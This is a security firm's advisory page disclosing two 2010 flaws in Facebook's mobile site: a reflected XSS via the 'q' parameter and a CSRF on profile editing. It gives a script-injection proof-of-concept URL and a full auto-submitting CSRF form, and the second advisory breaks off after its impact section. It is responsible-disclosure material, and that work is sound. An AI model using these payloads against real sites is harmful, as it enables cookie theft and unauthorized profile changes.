Internet Security Auditors - Advisories 2009

2010|2009|2008|2007|2006

2010-001: Facebook HTML and Script code injection vulnerability
2010-002: Facebook Cross-Site Request Forgery vulnerability

2010-001: Facebook HTML and Script code injection vulnerability

Original release date: January 8th, 2010
Last revised: February 3rd, 2010
Discovered by: Juan Galiana Lara
Severity: 6.3/10 (CVSS Base Scored)

BACKGROUND

Facebook is a social networking website that is operated and privately owned by Facebook, Inc. Users can add friends and send them messages, and update their personal profiles to notify friends about themselves. Additionally, users can join networks organized by city, workplace, school, and region. The website's name stems from the colloquial name of books given at the start of the academic year by university administrations with the intention of helping students to get to know each other better.

DESCRIPTION

The mobile interface of Facebook social network is affected by Cross-Site Scripting vulnerability due variable "q" is not properly sanitized in http://m.facebook.com/friends.php.

An attacker can inject HTML or script code in the context of victim's browser, so can perform XSS attacks, and steal cookies of a targeted user.

PROOF OF CONCEPT

http://m.facebook.com/friends.php?q=%3Cscript%3Ealert(%22XSS%22)%3B%3C%2Fscript%3E

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal user targeted cookies.

SYSTEMS AFFECTED

Facebook

SOLUTION

Corrected

REFERENCES

http://www.facebook.com
http://www.isecauditors.com
http://juangaliana.blogspot.com

CREDITS

This vulnerability has been discovered by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

REVISION HISTORY

January 8, 2010: Initial release.
February 3, 2010: Last revision.

DISCLOSURE TIMELINE

January 2, 2010: Discovered by Internet Security Auditors.
January 9, 2010: Vendor contacted including PoC. No response.
January 11, 2010: Second contact. No response.
January 19, 2010: Third contact. No response. January 20, 2010: Vulnerability corrected without any kind of contact.
January 31, 2010: Response from Facebook Security member requiring info.
February 3, 2010: Sent to lists for public interest.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

Volver al inicio

2010-002: Facebook Cross-Site Request Forgery vulnerability

Original release date: February 2nd, 2010
Last revised: February 12th, 2010
Discovered by: Juan Galiana Lara
Severity: 6.3/10 (CVSS scored)

BACKGROUND

DESCRIPTION

The mobile interface of Facebook social network is affected by Cross-Site Request Forgery (CSRF) vulnerability. The CSRF is due resource http://m.facebook.com/a/editprofile.php is not properly protected with a token when attempting to update some variables like phone_cell or phone_other. An attacker can force a user to perform actions on Facebook, changing its profile in an unauthorized manner.

PROOF OF CONCEPT

CSRF POC:

<html> <head>
<script>
function send() {
document.forms[0].submit();
}
</script>
</head>

<body onload="send();">
<form action="http://m.facebook.com/a/editprofile.php?edit=phone_cell&type=contact" method="post">
<input type="hidden" name="phone_num" value="600000000">
<input type="hidden" name="save" value="">
</form>
</body>
</html>

Other variables are affected, like phone_num and phone_ext when edit has the value phone_other.

BUSINESS IMPACT

An attacker can force an end user to execute unwanted actions on Facebook. Successful exploitation of proof of concept allows to update data of the victim profile.